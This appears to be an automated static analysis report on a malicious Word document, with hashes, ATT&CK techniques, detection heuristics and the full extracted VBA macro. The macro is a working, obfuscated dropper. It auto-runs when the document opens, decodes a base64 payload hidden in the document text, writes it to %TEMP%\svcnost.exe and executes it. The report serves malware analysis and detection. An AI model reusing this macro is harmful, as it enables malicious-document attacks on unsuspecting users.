Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3e6006e1b85b9fb7…

MALICIOUS

Office (OLE)

91.5 KB Created: 2014-12-13 01:32:00 Authoring application: Microsoft Office Word First seen: 2015-06-09
MD5: 65f147a8e8ec2928894a742f644fa584 SHA-1: 4206466e8f86280ec99dc7f29200052a5673aad9 SHA-256: 3e6006e1b85b9fb7d1b528384110698d285a16c1a05195484a5ff7b961fb2c5f
214 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is designed to execute when the document is opened, and it attempts to use the Environ function to get the TEMP directory. The presence of 'Potential Shell call in VBA' and 'Macro/content-enable lure' heuristics, along with the AutoOpen macro, strongly suggests this document is a downloader or dropper.

Heuristics 10

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
     Shell a, b
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    tnvn1 = Environ("TE" & dsgf77zpz333g3338376gfhdfgyfte)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4686 bytes
SHA-256: 4ddccabd4b491bcc37ff21e594d4183f6a07c1235d08fc0e613f30d186d30ddb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Const clOneMask = 16515072
Const clTwoMask = 258048
Const clThreeMask = 4032
Const clFourMask = 63

Const clHighMask = 16711680
Const clMidMask = 65280
Const clLowMask = 255

Sub Auto_Open()
 fsd77zpz333g333et
End Sub
Sub AutoOpen()
 Auto_Open
End Sub
Sub Workbook_Open()
 Auto_Open
End Sub

Sub sfzxcozxco98438fd77zpz33dg543rq4t(a)
 Close #a
End Sub

Sub sfasfd77zpz33dg543rq4t(a, b)
 Shell a, b
End Sub

Sub in88ssttrr77zpz33dg543rq4t(a, b)
 Open a For Binary Lock Write As #b
End Sub


Sub fsd77zpz333g333et()
Const cl2Exp18 = 262144
Const cl2Exp12 = 4096
Const cl2Exp6 = 64
Const cl2Exp8 = 256
Const cl2Exp16 = 65536

Dim tnvn1
Dim tn33n1
Dim bywr
Dim l234inp44fff
Dim i377zpz333g333et As Integer
Dim strPrompt As String
Dim dsgf77zpz333g3338376gfhdfgyfte As String
Dim ddd28977zpz333g333dd
dsgf77zpz333g3338376gfhdfgyfte = "rw45112twtq45t277zpz333g333436yu47"
dsgf77zpz333g3338376gfhdfgyfte = "rw4225twtq45t277zpz333g333436yu47"
ddd28977zpz333g333dd = ActiveDocument.Range.Text
dsgf77zpz333g3338376gfhdfgyfte = "rw4qwqw5twtq45t277zpz333g333436yu47"
dsgf77zpz333g3338376gfhdfgyfte = "rw4weewe5twtq45t277zpz333g333436yu47"
strPrompt = "456789087654323456"
dsgf77zpz333g3338376gfhdfgyfte = "rw45twtq45t277zpz333g333436yu47"
dsgf77zpz333g3338376gfhdfgyfte = "MP"
tnvn1 = Environ("TE" & dsgf77zpz333g3338376gfhdfgyfte)
dsgf77zpz333g3338376gfhdfgyfte = "ost.e" & "xe"
tn33n1 = tnvn1 & "svcn" & dsgf77zpz333g3338376gfhdfgyfte

Dim D11at222a
D11at222a = ddd28977zpz333g333dd
Dim so333p
Dim so333p22
Dim Sy3277zpz333g333bol
Dim jdsfytsdufsdftwywrgsadf
Dim by33swr
Dim bxcvxcvwr

dsgf77zpz333g3338376gfhdfgyfte = "8"
so333p = InStr(12, D11at222a, "567" & dsgf77zpz333g3338376gfhdfgyfte)
so333p22 = InStr(12, D11at222a, "9999")
by33swr = so333p + 4
bxcvxcvwr = so333p22 - by33swr
Dim sString As String
sString = Mid(D11at222a, by33swr, bxcvxcvwr)

in77zpz333g333ff = FreeFile
in88ssttrr77zpz33dg543rq4t tn33n1, in77zpz333g333ff
Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
Dim lTemp As Long

sString = Replace(sString, vbCr, vbNullString)
sString = Replace(sString, vbLf, vbNullString)
lTemp = Len(sString) Mod 4
If InStrRev(sString, "==") Then
    iPad = 2
ElseIf InStrRev(sString, "=") Then
    iPad = 1
End If
For lTemp = 0 To 255
  Select Case lTemp
  Case 65 To 90
  bTrans(lTemp) = lTemp - 65
  Case 97 To 122
  bTrans(lTemp) = lTemp - 71
  Case 48 To 57
  bTrans(lTemp) = lTemp + 4
  Case 43
  bTrans(lTemp) = 62
  Case 47
  bTrans(lTemp) = 63
  End Select
Next lTemp

For lTemp = 0 To 63
  lPowers6(lTemp) = lTemp * cl2Exp6
  lPowers12(lTemp) = lTemp * cl2Exp12
  lPowers18(lTemp) = lTemp * cl2Exp18
Next lTemp

bIn = StrConv(sString, vbFromUnicode)
ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)

For lChar = 0 To UBound(bIn) Step 4
  lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
  lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))
  lTemp = lQuad And clHighMask
  bOut(lPos) = lTemp \ cl2Exp16
  lTemp = lQuad And clMidMask
  bOut(lPos + 1) = lTemp \ cl2Exp8
  bOut(lPos + 2) = lQuad And clLowMask
        
        
Put #in77zpz333g333ff, , bOut(lPos)
Put #in77zpz333g333ff, , bOut(lPos + 1)
Put #in77zpz333g333ff, , bOut(lPos + 2)
        
        
  lPos = lPos + 3
Next lChar

sOut = StrConv(bOut, vbUnicode)
If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)

i377zpz333g333et = 1
sfzxcozxco98438fd77zpz33dg543rq4t in77zpz333g333ff
jdsfytsdufsdftwywrgsadf = tn33n1
dsgf77zpz333g3338376gfhdfgyfte = "rw45twtq45t277zpz333g333436yu47"
dsgf77zpz333g3338376gfhdfgyfte = "rw45twtq45t277zpz333g333436yu47"
dsgf77zpz333g3338376gfhdfgyfte = "rw45twtq45t277zpz333g333436yu47"
sfasfd77zpz33dg543rq4t jdsfytsdufsdftwywrgsadf, i377zpz333g333et
dsgf77zpz333g3338376gfhdfgyfte = "rw45t23234wtq45t277zpz333g333436yu47"
dsgf77zpz333g3338376gfhdfgyfte = "rw42342345twtq45t277zpz333g333436yu47"
dsgf77zpz333g3338376gfhdfgyfte = "rw4dgdf5twtq45t277zpz333g333436yu47"
dsgf77zpz333g3338376gfhdfgyfte = "rwdsdsf45twtq45t277zpz333g333436yu47"
dsgf77zpz333g3338376gfhdfgyfte = "rwdfgdfgdg45twtq45t277zpz333g333436yu47"

End Sub

Sub Document_New()

End Sub